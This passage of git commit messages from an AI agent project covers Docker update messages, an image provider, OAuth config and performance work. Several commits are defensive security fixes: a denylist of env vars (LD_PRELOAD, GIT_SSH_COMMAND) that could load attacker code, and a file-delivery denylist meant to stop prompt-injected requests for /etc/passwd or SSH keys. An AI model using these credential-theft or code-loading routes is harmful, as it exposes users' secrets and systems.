and zh-Hans, updated the developer-guide ABC table.
Net: 25 files, +115/-1067.
Closes#33762 (the schema-text bug only existed if #32608 landed).
Supersedes #32608.
Inside the published Docker image, `hermes update` was hitting the
".git missing → reinstall via curl" fallback:
✗ Not a git repository. Please reinstall:
curl -fsSL https://raw.githubusercontent.com/.../install.sh | bash
That message is wrong on two counts:
1. It tells the user to run the host-side installer, which would
install a *new* Hermes on the host — not update the running
container.
2. It doesn't mention `docker pull` at all, leaving Docker users
to figure out the right action from scratch.
`hermes update --check` was worse: it bailed with "Not a git
repository — cannot check for updates." and nothing else.
Fix: detect the Docker install method (already stamped by
`docker/stage2-hook.sh` and surfaced by `detect_install_method()`)
in both update entry points and print a long-form message that
covers:
- The right command: `docker pull nousresearch/hermes-agent:latest`
- Restart guidance (`docker compose up -d --force-recreate` /
re-run `docker run`)
- How to verify the new version after restart
- Tag-pinning caveat (`:latest` doesn't move a pinned tag)
- Config persistence across upgrades (state under `HERMES_HOME` /
`/opt/data` is bind-mounted and survives)
- Fork escape hatch (build your own image with the repo's Dockerfile)
Exit code is 1 (matches `managed_error` semantic for "tried to
update but can't update this way").
Plumbing:
- hermes_cli/config.py: new `format_docker_update_message()` helper
sits next to the existing `_NIX_UPDATE_MSG` /
`format_managed_message()` family so the wording lives in one
place and both call sites (apply path + check path) consume it.
- hermes_cli/main.py:
* `cmd_update()`: bail right after the `is_managed()` gate, before
any of the apply-path branches.
* `_cmd_update_check()`: bail at the top of the function, before
the existing `method == "pip"` branch.
Neither path touches subprocess.run / git when method == "docker".
Coverage:
- 7 new tests in `tests/hermes_cli/test_cmd_update_docker.py`:
* `hermes update` in Docker → message + exit 1, no git calls
* `hermes update --check` (via cmd_update) → same
* `--yes` / `--force` don't bypass (intentional)
* `_cmd_update_check` called directly → bails too
* git/pip installs still take their normal paths (regression guards)
* `format_docker_update_message` content-lock test pinning the
five user-actionable bits the message must contain
- Existing test_cmd_update.py (21 tests) + test_managed_installs.py
(5 tests) still pass — no regression on the source-install path.
- Verified end-to-end in a real container: `docker run ... update`
and `docker run ... update --check` both render the message and
exit 1.
* feat(image_gen): add Krea provider plugin (Krea 2 Medium + Large)
New built-in image_gen backend wrapping Krea's Krea 2 foundation
image model family. Auto-discovered like the other image_gen plugins
and appears in 'hermes tools' → Image Generation → Krea.
Krea's API is asynchronous — submit returns a job_id, poll /jobs/{id}
until terminal. The provider hides that behind the synchronous
ImageGenProvider.generate() contract: submit, poll every 2s with
light backoff (max 5s), 3-minute ceiling matching Krea's hosted-tool
timeout. Result URL is materialised to $HERMES_HOME/cache/images/
to avoid CDN-expiry 404s downstream (same fix as xAI #26942).
Models:
- krea-2-medium (default — Krea's 'start here' recommendation)
- krea-2-large
Aspect ratios map landscape→16:9, square→1:1, portrait→9:16.
Resolution: 1K (Krea's only current option).
Kwarg passthrough: seed, creativity (raw/low/medium/high), styles,
image_style_references (capped 10), moodboards (capped 1) — matches
Krea's per-request limits. Unknown kwargs are ignored.
Config knobs (config.yaml):
image_gen.provider: krea
image_gen.krea.model: krea-2-medium | krea-2-large
image_gen.krea.creativity: raw | low | medium | high
Env overrides: KREA_API_KEY (required), KREA_IMAGE_MODEL.
KREA_API_KEY is registered in OPTIONAL_ENV_VARS so 'hermes setup'
prompts for it.
31 new tests; image_gen suite + picker + tools_config: 211/211.
* fix(image_gen/krea): address review feedback
- Update KREA_API_KEY setup URL to the canonical token-creation page
(https://www.krea.ai/app/api/tokens). The previous URL returned 404.
- Fail fast on non-retryable HTTP statuses during poll. The previous
loop retried every HTTPError for the full 180s deadline, so an auth
(401), billing (402), forbidden (403), or not-found (404) response
would make image_generate hang for three minutes. Only retry
transient statuses (408/409/425/429/5xx); surface everything else
immediately.
- Add 5 tests covering fail-fast on 401/403/404 and retry on 429/503.
* fix(krea): point users at the real API token dashboard URL
Three call sites linked users to dashboard pages that don't exist:
- hermes_cli/config.py: https://www.krea.ai/app/api/tokens
- plugins/image_gen/krea/__init__.py get_setup_schema: https://www.krea.ai/api-keys
- plugins/image_gen/krea/__init__.py auth_required error: https://www.krea.ai/api-keys
Per Krea's own docs (https://docs.krea.ai/developers/api-keys-and-billing),
the real dashboard URL is https://www.krea.ai/settings/api-tokens. All three
sites now point there.
Operators behind reverse proxies that don't reliably forward
X-Forwarded-Host / X-Forwarded-Proto / X-Forwarded-Prefix (manual
nginx setups, on-prem ingresses, custom-domain Fly deploys with
incomplete proxy chains) had no way to force the absolute base URL
the OAuth callback redirects from. The dashboard would reconstruct
the redirect_uri from request headers, the IDP would echo it back,
and the user would land on the wrong host or wrong path — 404.
Add `dashboard.public_url` to config.yaml with env override
HERMES_DASHBOARD_PUBLIC_URL. When set, it is the complete authority —
scheme + host + optional path prefix (e.g. https://example.com/hermes) —
and becomes the base for the OAuth `redirect_uri`. X-Forwarded-Prefix
is IGNORED on this code path because the operator has explicitly
declared the public URL; we no longer need to guess from proxy
headers, and stacking the prefix on top would double-prefix the
common case where the prefix is already baked into public_url.
When unset, the existing proxy_headers + X-Forwarded-Prefix
reconstruction runs untouched. Existing Fly.io deploys continue to
work without configuration — this is purely additive.
Precedence mirrors dashboard.oauth.client_id:
env (non-empty) > config.yaml > reconstructed from request
Implementation:
- hermes_cli/config.py: add dashboard.public_url to DEFAULT_CONFIG
with a multi-paragraph doc comment explaining the use case,
the X-Forwarded-Prefix interaction, and the validation rules.
- hermes_cli/dashboard_auth/prefix.py: factored out the existing
_REJECT_CHARS frozenset, added _normalise_public_url() validator
(requires http/https scheme + non-empty host + no header-injection
chars), _load_dashboard_section() loader (robust to load_config
raising, non-dict shapes), and resolve_public_url() entry point
with the env-overrides-config precedence. A malformed value
silently falls through to ""; the caller treats "" as "reconstruct
from request" so a typo never breaks the login flow.
- hermes_cli/dashboard_auth/routes.py: rewrite _redirect_uri()
docstring to spell out the three resolution tiers; add the
public_url short-circuit before the existing X-Forwarded-Prefix
splicing. Source-level comment notes that X-Forwarded-Prefix is
intentionally ignored when public_url is set so a future reader
doesn't try to "fix" the missing prefix layering.
- cli-config.yaml.example: extend the existing dashboard section
with a public_url block.
- website/docs/user-guide/features/web-dashboard.md: new "Public
URL override" section between the provider configuration and
the OAuth flow walkthrough. Documents the env-vs-config table,
the validation rules, and the `http://` `public_url` ↔ Secure
cookie footgun.
Test coverage — new TestPublicUrlOverride class (8 tests):
- env var overrides request reconstruction (the primary motivating
case)
- config.yaml used when env unset
- env wins over config (precedence pin)
- public_url with a path prefix already baked in (the Q1-a case the
user explicitly chose)
- public_url suppresses X-Forwarded-Prefix layering (defends
against the double-prefix bug)
- trailing slash stripped from public_url (no //auth/callback)
- malformed public_url falls through to reconstruction (six
hostile inputs: javascript:, ftp:, missing scheme, missing host,
quote chars, CRLF injection)
- empty env string doesn't shadow config.yaml entry (CI / Fly
provisioned-but-empty secret case)
Mutation-tested: flipping the precedence in resolve_public_url() trips
exactly test_env_overrides_config_public_url; weakening the validator
(accept any scheme) trips exactly test_malformed_public_url_falls_through_to_reconstruction.
Both other tests in each pair stay green, confirming the suite
discriminates the specific regression each test pins.
Per AGENTS.md, ~/.hermes/.env is reserved for API keys / secrets and
config.yaml is the surface for non-secret configuration. The Nous
Portal plugin previously read HERMES_DASHBOARD_OAUTH_CLIENT_ID and
HERMES_DASHBOARD_PORTAL_URL from the environment only, which forced
local-dev / on-prem operators to put non-secret per-instance
configuration in .env — violating the convention.
Add dashboard.oauth.{client_id,portal_url} to DEFAULT_CONFIG and have
the plugin resolve each setting with env-overrides-config precedence:
1. Env var when set to a non-empty value (Fly.io platform-secret
injection — what pushes per-deploy client_ids without baking
them into the image).
2. config.yaml entry (canonical surface for local dev / on-prem).
3. Plugin default (no provider registered when client_id is empty;
portal_url defaults to https://portal.nousresearch.com).
Empty env values are explicitly treated as unset so a provisioned-but-
not-populated Fly secret can't accidentally shadow a valid config.yaml
entry with an empty string — operators would otherwise lose the gate.
Implementation:
- hermes_cli/config.py: add dashboard.oauth.{client_id,portal_url}
block to DEFAULT_CONFIG with full doc comment explaining the
override precedence and Fly.io rationale.
- plugins/dashboard_auth/nous/__init__.py: add _load_config_oauth_section,
_resolve_client_id, _resolve_portal_url helpers; replace the two
direct os.environ.get() calls in register() with the resolvers.
Update the skip-reason string to mention BOTH surfaces so an
operator looking at the fail-closed bind error knows config.yaml
is a valid alternative to the env var.
- plugins/dashboard_auth/nous/plugin.yaml: update description to
name both surfaces. requires_env stays pointing at the env var
name — it's metadata-only (not used by the plugin loader for
gating) so this is documentation/UX, not enforcement.
- cli-config.yaml.example: append commented dashboard.oauth block
with the same override rationale operators see in code.
- website/docs/user-guide/features/web-dashboard.md: rewrite the
'Default provider: Nous Research' section to lead with config.yaml,
present env vars as operator overrides (Fly.io's primary path).
Updated the example fail-closed bind error to match the new
skip-reason text.
Test coverage — new TestConfigYamlSource class (8 tests) pinning
every tier of the precedence chain:
- config-yaml-only path registers correctly
- both config-yaml fields (client_id + portal_url) honoured
- env var overrides config for client_id (Fly.io critical path)
- env var overrides config for portal_url
- empty env string does NOT shadow config (CI/Fly edge case)
- neither source set → skip with reason mentioning BOTH surfaces
- load_config() raising falls through to env-only path (resilience)
- non-dict oauth section falls through cleanly (typo resilience)
Mutation-tested: flipping the precedence to config-wins-over-env trips
exactly test_env_overrides_config_client_id while the other 7 stay
green, confirming the suite discriminates the order, not just the
sources.
This closes the last item in Teknium's PR review (PR #30156).
* remove Vercel AI Gateway provider and Vercel Sandbox terminal backend
Both Vercel-hosted integrations are removed end-to-end. Users on the AI
Gateway should switch to OpenRouter or one of the other aggregators
(Nous Portal, Kilo Code). Users on the Vercel Sandbox backend should
switch to Docker, Modal, Daytona, or SSH.
What's removed:
- `plugins/model-providers/ai-gateway/` provider plugin
- `hermes_cli/vercel_auth.py` Vercel-Sandbox auth helper
- `tools/environments/vercel_sandbox.py` terminal backend
- `ai-gateway` provider wiring across auth, doctor, setup, models,
config, status, providers, main, web_server, model_normalize, dump
- `vercel_sandbox` backend wiring across terminal_tool, file_tools,
code_execution_tool, file_operations, approval, skills_tool,
environments/local, credential_files, lazy_deps, prompt_builder,
cli, gateway/run
- `AI_GATEWAY_BASE_URL` constant, `_AI_GATEWAY_HEADERS` auxiliary-client
header set, run_agent base-URL header/reasoning special-cases
- `[vercel]` pyproject extra and `vercel`/`vercel-workers` from uv.lock
- env vars: `AI_GATEWAY_API_KEY`, `AI_GATEWAY_BASE_URL`, `VERCEL_TOKEN`,
`VERCEL_PROJECT_ID`, `VERCEL_TEAM_ID`, `VERCEL_OIDC_TOKEN`,
`TERMINAL_VERCEL_RUNTIME`
- Tests: deletes test_ai_gateway_models.py and
test_vercel_sandbox_environment.py; scrubs references across 23
surviving test files (no entire tests deleted unless they were
dedicated to AI Gateway / Sandbox)
- Docs: provider tables, env-var reference, setup guides, security
notes, tool config, terminal-backend tables — English plus zh-Hans
i18n parity
- `hermes-agent` skill: provider table entry and remote-backend list
What stays (intentional):
- `popular-web-designs/templates/vercel.md` — CSS design reference,
unrelated to Vercel-the-AI-product
- `x-vercel-id` in `stream_diag.py` headers — generic Vercel CDN
response header, useful diag signal on any Vercel-hosted endpoint
- `vercel-labs/agent-browser` URL in browser config — lightpanda
browser project, different OSS effort
- `userStories.json` historical contributor entry mentioning Vercel
Sandbox — archive, not active docs
Validation:
- 1153 tests in the 22 targeted files pass (`scripts/run_tests.sh`)
- Full repo `py_compile` clean
- Live import of every touched module + invariant check (no
`ai-gateway` in `PROVIDER_REGISTRY`, no `_AI_GATEWAY_HEADERS`, no
`vercel_sandbox` in `_REMOTE_TERMINAL_BACKENDS`)
* test: convert profile-count check from change-detector to invariant
The hardcoded "== 34" assertion broke when ai-gateway was removed.
Per AGENTS.md change-detector-test guidance, assert the relationship
(registry count >= number of plugin dirs) instead of a literal count.
Counts shift when providers are added/removed; that's expected.
Follow-up to #32087 after community report from @ethernet that 8000-char
single-line pastes get dumped raw into the input box.
A) Fallback regression revert
paste_collapse_threshold_fallback default: 0 -> 5
#32087 disabled the fallback handler by default. The fallback path
has been always-on with line_count >= 5 since #3065 (March 2026);
the previous shape was the salvaged contributor's design and didn't
match pre-existing behavior for terminals without bracketed paste
support (Windows terminals, some SSH setups). Restoring the original
on-by-default.
B) Long single-line paste guard
New config key: paste_collapse_char_threshold (default 2000)
Bracketed-paste handler and fallback handler now BOTH collapse when
line count >= line threshold OR total char length >= char threshold.
Catches the case ethernet hit: ~8000 chars of minified JSON / log
output on a single line dumped raw into the buffer.
TUI mirrors the same config via uiStore.pasteCollapseChars.
Set 0 to disable.
Defaults verified:
paste_collapse_threshold: 5
paste_collapse_threshold_fallback: 5
paste_collapse_char_threshold: 2000
Tests:
tests/hermes_cli/test_config.py: 87/87 pass
ui-tui useConfigSync.test.ts: 34/34 pass
ui-tui useComposerState.test.ts: 9/9 pass
tsc: 0 new errors in touched files
Two posture fixes surfaced by the web-pentest skill self-test against
the dashboard (issue #32267).
1. /dashboard-plugins/<name>/<path> previously returned 200 for any
file inside the plugin's dashboard directory — including
plugin_api.py and __pycache__/*.pyc. The path is unauthenticated by
architecture (SPA loads JS via <script src> and CSS via <link href>,
neither of which can attach a custom auth header), so the fix is
not "require token" — it's "restrict to browser-fetchable suffixes."
Allowlist now: .js .mjs .css .json .html .svg .png .jpg .jpeg .gif
.webp .ico .woff .woff2 .ttf .otf .map. Everything else → 404.
This stops a private user-installed plugin's Python source from
being readable by anyone reachable on the dashboard's loopback port
(other local users on a shared box, sidecar containers sharing the
host netns).
2. save_env_value() now refuses to persist env-var names that
influence how the next subprocess executes: LD_PRELOAD,
LD_LIBRARY_PATH, LD_AUDIT, DYLD_*, PYTHONPATH, PYTHONHOME,
PYTHONSTARTUP, NODE_OPTIONS, NODE_PATH, PATH, SHELL, EDITOR,
VISUAL, PAGER, BROWSER, GIT_SSH_COMMAND, GIT_EXEC_PATH; plus
HERMES_HOME / HERMES_PROFILE / HERMES_CONFIG / HERMES_ENV.
PUT /api/env is authed but the session token lives in the SPA HTML
where any future plugin XSS or local process can read it. Without
this gate, a token-holder could plant LD_PRELOAD in .env and the
next hermes process start would load attacker code via the dotenv
to os.environ chain. This is enforced on write only — pre-existing
.env values are left alone (the gate is in save_env_value, not in
load_env). PUT /api/env now returns 400 with the explanatory
message instead of an opaque 500.
IMPORTANT: HERMES_* overall is NOT blocked — only the four runtime
location names. Integration credentials following the HERMES_*
convention (HERMES_GEMINI_*, HERMES_LANGFUSE_*, HERMES_SPOTIFY_*,
HERMES_QWEN_BASE_URL, ...) keep working.
Regression tests cover both fixes (30 new test cases). No existing
tests changed; 257 passing in tests/hermes_cli/.
Closes#32267.
Adds two new config keys:
- paste_collapse_threshold (default: 5) — line count threshold for
bracketed paste collapse in both TUI and CLI
- paste_collapse_threshold_fallback (default: 0, disabled) — same for
the fallback heuristic in terminals without bracketed paste support
TUI frontend reads these from config.get full via applyDisplay/patchUiState.
CLI reads from self.config at paste-handling time.
Closes#5626
Related: #5623
The gateway's media delivery allowlist required files live inside
`~/.hermes/cache/{documents,images,...}`, which is the wrong shape for
real agent usage. Agents naturally produce artifacts via terminal tools
(`pandoc -o /tmp/report.pdf`, `matplotlib savefig`, etc.) or
write_file into project directories — these never land under the cache.
Result: users got a raw file path in chat instead of an attachment.
This is doubly bad in deployment shapes where the cache directories
aren't writable by the agent at all: Hermes running in Docker with a
read-only mount, or with a Docker/Modal/SSH terminal backend whose
filesystem isn't the gateway host's filesystem.
Layered trust model:
1. Cache-dir allowlist (unchanged) — Hermes-managed roots always trusted.
2. Operator allowlist — `HERMES_MEDIA_ALLOW_DIRS` env var, now also
surfaced as `gateway.media_delivery_allow_dirs` in config.yaml.
3. Recency-based trust (new, default on) — files whose mtime is within
`gateway.trust_recent_files_seconds` (default 600s) of "now" are
trusted even outside the cache/operator allowlist. Old host files
(`/etc/passwd`, `~/.bashrc`, `~/.ssh/id_rsa`) have mtimes measured
in days/months, well outside the window — prompt-injection paths
pointing at pre-existing files are still rejected.
4. Hard denylist — `/etc`, `/proc`, `/sys`, `/dev`, `/root`, `/boot`,
`/var/{log,lib,run}`, plus `$HOME/.{ssh,aws,gnupg,kube,docker,config,
azure,gcloud}` and `Library/Keychains`. Denylist blocks delivery
even when recency would trust the file, in case an attacker
somehow refreshes a sensitive file's mtime.
Operators who want strict-allowlist behavior set
`gateway.trust_recent_files: false` and the system reverts to
pre-existing behavior.
Tests: 6 new cases in test_platform_base.py cover the recency window,
disabled mode, system-path denylist, and the motivating PDF-in-project
scenario. 3 existing tests (test_platform_base, test_tts_media_routing,
test_send_message_tool) that exercised the strict-allowlist path are
updated to disable recency trust explicitly.
E2E validation: real `validate_media_delivery_path()` accepts fresh
PDFs in /tmp and project dirs, rejects /etc/passwd, ~/.ssh/id_rsa, and
files older than the window; config.yaml `gateway.*` keys bridge
correctly to the env vars the validator reads.
The s6-overlay migration replaced every runtime use of gosu with
s6-setuidgid (in stage2-hook.sh, main-wrapper.sh, per-service run
scripts, and cont-init.d hooks), but the gosu binary itself was still
being copied into the image from tianon/gosu, and several comments
across the repo still pointed to it.
Image changes:
- Drop the FROM tianon/gosu:1.19-trixie AS gosu_source stage
- Drop the COPY --from=gosu_source /gosu /usr/local/bin/ layer
- Net: one fewer base-image pull, ~12-15 MB layer eliminated
Documentation/comment refresh (no behavior change):
- Dockerfile: update root-user rationale comment + cont-init.d comment
- docker/main-wrapper.sh: drop "pre-s6 contract (gosu drop)" reference
- docker-compose.yml: update UID/GID remap comment
- .hadolint.yaml: update DL3002 ignore rationale
- website/docs/user-guide/docker.md: privilege-drop helper is s6-setuidgid now
- hermes_cli/config.py: docker_run_as_host_user docstring
tools/environments/docker.py runs *arbitrary user images* via the
terminal backend, not the bundled Hermes image. It still needs SETUID/
SETGID caps so user images that use gosu/su/s6-setuidgid all work.
Renamed the cap-list constant _GOSU_CAP_ARGS → _PRIVDROP_CAP_ARGS and
updated comments to list s6-setuidgid alongside the others as examples.
The matching test (test_security_args_include_setuid_setgid_for_gosu_drop
→ test_security_args_include_setuid_setgid_for_privdrop) was renamed
and its docstring updated; behavior is unchanged.
Verification:
- hadolint clean against .hadolint.yaml
- shellcheck clean against all docker/ shell scripts
- Image rebuilt successfully (sha 1a090924ccea)
- Docker harness: 19 passed in 41.87s (every Phase 0 test + Phase 4
per-profile-gateway lifecycle + container-restart reconciliation)
- tests/tools/test_docker_environment.py: 23 passed (rename did not
break test discovery; pre-existing unrelated mock warning)
The plan document (docs/plans/2026-05-07-s6-overlay-dynamic-subagent-gateways.md)
intentionally retains its historical references to gosu — it describes
the pre-s6 entrypoint as background for understanding the migration.
The hardcoded constants in _display_resumed_history were exposed as
config in PR #4434; declare them in DEFAULT_CONFIG and the CLI fallback
dict so they show up in 'hermes config' diagnostics and the schema
validator.
Closes#31370.
bws defaults to the US identity endpoint, so EU Cloud and self-hosted
machine-account tokens fail with [400 Bad Request] {"error":"invalid_client"}
during 'hermes secrets bitwarden setup'. The token is valid — it's just
being checked against the wrong region.
Add a Bitwarden region step to the wizard between the access-token and
project-list steps:
Step 1 Install bws
Step 2 Provide access token
Step 3 Pick region <-- new (US / EU / self-hosted-custom-URL)
Step 4 Pick project (now talks to the right endpoint)
Step 5 Test fetch
Region is stored in config.yaml as secrets.bitwarden.server_url and
plumbed into every bws subprocess as BWS_SERVER_URL (project list,
secret list, test fetch, and the env_loader startup pull).
Also:
- Non-interactive: 'hermes secrets bitwarden setup --server-url ...'
- Pre-existing BWS_SERVER_URL in the shell is detected and reused
- Cache key includes server_url so EU/US fetches don't collide
- 'hermes secrets bitwarden status' shows the configured region
- 'invalid_client' / '400 Bad Request' from bws now triggers a hint
pointing at the region setting instead of looking like a bad token
* feat(secrets): Bitwarden Secrets Manager integration with lazy bws install
Pull API keys from Bitwarden Secrets Manager at process startup
instead of storing them all in plaintext in ~/.hermes/.env. One
bootstrap token (BWS_ACCESS_TOKEN) replaces N per-provider keys, and
rotating a credential becomes a single change in the Bitwarden web
app.
Bitwarden defaults to source of truth: secrets pulled from BSM
overwrite any matching env vars on startup so rotations actually
take effect. Set secrets.bitwarden.override_existing: false in
config.yaml to invert.
The bws binary is auto-downloaded into ~/.hermes/bin/bws on first
use (pinned to v2.0.0, SHA-256 verified against the GitHub release
checksum file). No apt, brew, or sudo required.
New surfaces:
hermes secrets bitwarden setup — interactive wizard
hermes secrets bitwarden status — config + binary + token state
hermes secrets bitwarden sync — dry-run fetch / --apply exports
hermes secrets bitwarden disable — flip enabled: false
hermes secrets bitwarden install — just download the binary
Failures (missing binary, bad token, no network) never block Hermes
startup — they emit a one-line warning to stderr and continue with
whatever credentials .env already had.
Docs: website/docs/user-guide/secrets/{index,bitwarden}.md
Tests: tests/test_bitwarden_secrets.py (26 tests, hermetic — bws
subprocess and HTTP downloads fully mocked)
* chore(infographic): add bitwarden-secrets-manager bento-grid retro-pop-grid
Generated for PR #30035 — Bitwarden Secrets Manager integration.
Style picked via pick_pr_infographic_style.py rotation:
layout: bento-grid
style: retro-pop-grid
aspect: 1:1 square
Saved at infographic/bitwarden-secrets-manager/infographic.png
Allow custom OpenAI-compatible providers declared under `custom_providers:`
to set provider-specific `extra_body` fields and have Hermes merge them into
chat-completions requests when the matching custom endpoint is active.
This is a manual per-provider override rather than a model-name heuristic.
OpenAI-compatible Gemma thinking support is real, but the on-wire payload
shape is backend-specific: some servers want top-level `enable_thinking`,
while vLLM Gemma and NIM-style endpoints expect `chat_template_kwargs`.
A per-provider override is safer than picking one assumed payload.
Example config:
```yaml
custom_providers:
- name: gemma-local
base_url: http://localhost:8080/v1
model: google/gemma-4-31b-it
extra_body:
enable_thinking: true
reasoning_effort: high
```
For vLLM Gemma or NIM-style endpoints, use the nested shape those servers
expect:
```yaml
extra_body:
chat_template_kwargs:
enable_thinking: true
```
Changes:
- `hermes_cli/config.py`: preserve `extra_body` in normalized
`custom_providers:` entries and allow it in the validated field set.
- `hermes_cli/runtime_provider.py`: propagate custom-provider `extra_body`
as `request_overrides.extra_body` for named custom runtime resolution,
including credential-pool paths.
- `agent/agent_init.py`: at agent init, locate the matching custom-provider
entry by `base_url` (+ optional model) and merge its `extra_body` into
`AIAgent.request_overrides`, with caller-provided overrides winning on
conflicting top-level keys.
- `plugins/model-providers/custom/__init__.py`: keep existing CustomProfile
behavior (Ollama `num_ctx`, `think=False` when reasoning disabled);
user-configured `extra_body` flows through `request_overrides`.
- `website/docs/integrations/providers.md`: document the explicit
`extra_body` override and the vLLM/Gemma `chat_template_kwargs` variant.
- Tests cover config normalization, runtime propagation, model matching,
trailing-slash equivalence, fallback when no `model` field is set, and
caller-override merging precedence.
Verified end-to-end against `CustomProfile` via `ChatCompletionsTransport`:
configured `extra_body` reaches `kwargs.extra_body` on the wire request,
and coexists with profile-generated entries (Ollama `num_ctx`, `think=False`)
without clobber.
Salvaged from #29022 onto current `main`. Cosmetic typing edit in
`plugins/model-providers/custom/__init__.py` and a stale-base docs revert
in `providers.md` were dropped during cherry-pick.
Closes#29022
PR #29182 deleted the per-session JSON snapshot writer outright because
state.db is canonical and the snapshots had no in-tree consumer. Some
users have external tooling that reads `~/.hermes/sessions/session_{sid}.json`
directly, so reintroduce the writer behind a config flag that defaults
to off.
- Add `sessions.write_json_snapshots` (default False) to DEFAULT_CONFIG
- Restore `AIAgent._save_session_log` + `_clean_session_content` as
gated methods. When the flag is off the call is a fast no-op; when
on, the writer behaves as before (atomic write, truncation guard
preserved, REASONING_SCRATCHPAD → think tag normalization)
- Re-derive the target path from `agent.session_id` on each call so
`/branch` and `/compress` re-points happen automatically — no need
to restore the explicit re-point bookkeeping at call sites
- Wire the single call site in `_persist_session` (the cleanup-on-exit
hook). Did NOT restore the 7 intra-turn calls the original PR deleted
— those were redundant writes within the same turn that doubled disk
I/O without adding any persistence guarantee `_persist_session` does
not already provide
- Read the flag once at agent init via `load_config()`, cache as
`agent._session_json_enabled`
- Update `TestNoSessionJsonSnapshot` → `TestSessionJsonSnapshotOptIn`
to pin behavior: default off (no file), opt-in true (file written),
no-op method on default agents, logs_dir retained unconditionally
- Update CONTRIBUTING.md and the bundled `hermes-agent` skill to
document the flag and its default
* perf(config): add load_config_readonly() fast path for hot agent loop
`load_config()` is called from the agent loop's per-API-call hot path via
`get_provider_request_timeout()` and `get_provider_stale_timeout()` —
both invoked once per turn from `_resolved_api_call_timeout()` in
run_agent.py.
Profiling a synthetic 20-tool-call agent run revealed:
- 21 invocations of `load_config()` cumulating 56ms (~17% of agent loop)
- 34,398 deepcopy calls totaling 37ms (config defensive deepcopy + chain)
- 8,652 `_expand_env_vars` invocations (~412 per turn)
Microbench (cache-hit, real config.yaml present):
load_config() 265us/call (125us deepcopy + 140us infra)
load_config_readonly() 138us/call (~48% faster)
`load_config_readonly()` returns the cached dict directly without the
defensive deepcopy. Documented contract: caller must not mutate. Returns
plain dict (not MappingProxyType) so downstream `isinstance(x, dict)`
guards keep working — caught during initial implementation when
MappingProxyType broke get_provider_request_timeout's guard logic.
Wired into hermes_cli/timeouts.py (the two functions called per agent
turn). load_config() is unchanged for the 263 other call sites that
mutate the result before save_config(), are not in the hot path, or
where the safety guarantee matters more than the perf.
Profile A/B (cached config, 21-turn agent loop):
BEFORE AFTER delta
get_provider_request_timeout 55ms 16ms -71%
total function calls 399k 160k -60%
deepcopy calls (in hotspots) 34,398 ~0 ~elim
Verified:
- isinstance(load_config_readonly(), dict) is True
- timeout/stale resolutions correct
- load_config() still returns isolated mutable deepcopies
- tests/hermes_cli/test_config*.py / test_timeouts.py: 102/102 pass
- tests/cli/ + tests/agent/test_auxiliary_client.py: 883/883 pass
* perf(redact): substring pre-screens skip non-matching regex chains
Every log record passes through `RedactingFormatter.format` which calls
`redact_sensitive_text`, which historically ran ALL 13 secret-pattern
regexes against every line — including DB connection strings, JWTs,
Discord mentions, Signal phone numbers, etc. — even for typical clean
log records like 'INFO run_agent: API call completed'.
Add cheap substring pre-checks before each regex pass. False positives
still run the regex (which then matches nothing); false negatives are
impossible because every pattern requires the gated substring to match
its leading anchor:
- `_PREFIX_RE` gated on any of 33 known credential prefix substrings
- `_ENV_ASSIGN_RE` gated on `=` in text
- `_JSON_FIELD_RE` gated on `:` and `"` in text
- `_AUTH_HEADER_RE` gated on `uthorization`/`UTHORIZATION` in text
- `_TELEGRAM_RE` gated on `:` in text
- `_PRIVATE_KEY_RE` gated on `BEGIN` and `-----`
- `_DB_CONNSTR_RE` gated on `://` in text
- `_JWT_RE` gated on `eyJ` in text
- URL userinfo/query gated on `://`
- `_redact_form_body` gated on `&` and `=`
- `_DISCORD_MENTION_RE` gated on `<@`
- `_SIGNAL_PHONE_RE` gated on `+`
Microbench (5 typical log records, 20k iterations each):
BEFORE AFTER delta
redact_sensitive_text per call 5.63us 1.79us -68%
Real-world impact: ~244 log records emitted in a 30-turn agent loop, so
the chain saves ~1ms of CPU per conversation. Bigger win is the
reduction in regex execution and GC pressure during heavy logging
sessions (verbose logging, gateway message processing).
Security regression test: 30 secret-containing inputs (sk-/ghp_/JWT/DB
connstr/Auth-Bearer/private key/URL userinfo/Discord/Signal/etc.)
verified to produce identical redacted output before/after. All 75
existing tests/agent/test_redact.py cases pass.
The `?access_token=foo&code=bar` (bare query string, no scheme) case
that 'leaks' is pre-existing behavior — the URL query redaction
requires a well-formed URL with scheme+host. Not a regression.
* perf(run_agent): cache _needs_thinking_reasoning_pad result per (provider, model, base_url)
Profile of a 31-turn synthetic agent run shows `_needs_thinking_reasoning_pad`
fires 495 times (~16 per turn) and each call ran 3 helper methods, each
hitting `base_url_host_matches` 1-4 times via `urlparse`. Total cost:
3,342 base_url_host_matches calls + 3,373 urlparse calls accounting for
~36ms of agent-loop overhead (~7% of the entire post-network work).
Provider / model / base_url don't change during a conversation except via
`switch_model` and fallback activation — both of which already overwrite
those attributes atomically. Cache the result on a tuple key; since the
key is derived from the very fields that would change, the cache
auto-invalidates on the next read after a switch. No manual invalidation
needed in switch_model / _try_activate_fallback.
Profile A/B (31-turn cached-config agent run):
BEFORE AFTER delta
_needs_thinking_reasoning_pad cum 18ms 1ms -94%
_copy_reasoning_content_for_api cum 17ms 1ms -94%
base_url_host_matches calls 3,342 372 -89%
urlparse calls 3,373 403 -88%
total function calls 296k 223k -25%
Verified:
- tests/run_agent/test_deepseek_reasoning_content_echo.py: 36/36 pass
- tests/run_agent/ (full): 1383/1383 pass + 3 skipped
PR #28452 (salvage of #23790, stale detection) merged with leftover
git conflict markers in hermes_cli/config.py around the
`dispatch_stale_timeout_seconds` config block, breaking config import
and any code path that loads it. Cleans up the markers and keeps both
config blocks (worker log rotation/orchestrator + stale detection).
Resolves a self-introduced regression.
Salvages #23790 by @thewillhuang. Adds detect_stale_running() to
the dispatcher cycle. Running tasks that have been started for longer
than dispatch_stale_timeout_seconds (default 14400 = 4h) without a
heartbeat in the last hour are auto-reclaimed to ready.
- New config kanban.dispatch_stale_timeout_seconds (default 14400, 0 disables)
- New 'stale' field on DispatchResult
- detect_stale_running() in kanban_db.py with heartbeat freshness check
- Records outcome='stale' on run close + 'stale' event; ticks failure counter
- Wires config through gateway embedded dispatcher
- Updates _cmd_dispatch verbose/JSON output and daemon logging
Resolved test-file end-of-file conflict by appending both halves.
PR #28102 made the summary-failure abort path the unconditional default,
changing established behavior. Gate it behind config.yaml flag
`compression.abort_on_summary_failure` (default False = historical
fallback-placeholder behavior).
- hermes_cli/config.py: new `compression.abort_on_summary_failure` key,
default False, documented inline.
- agent/agent_init.py: read the flag from compression config and pass to
ContextCompressor.
- agent/context_compressor.py: `__init__` accepts `abort_on_summary_failure`
(default False). `compress()` failure branch gates the abort on the
flag; when False, falls through to the restored legacy fallback path
(static "summary unavailable" placeholder + drop middle window).
- tests: restore original fallback expectations as default; add new
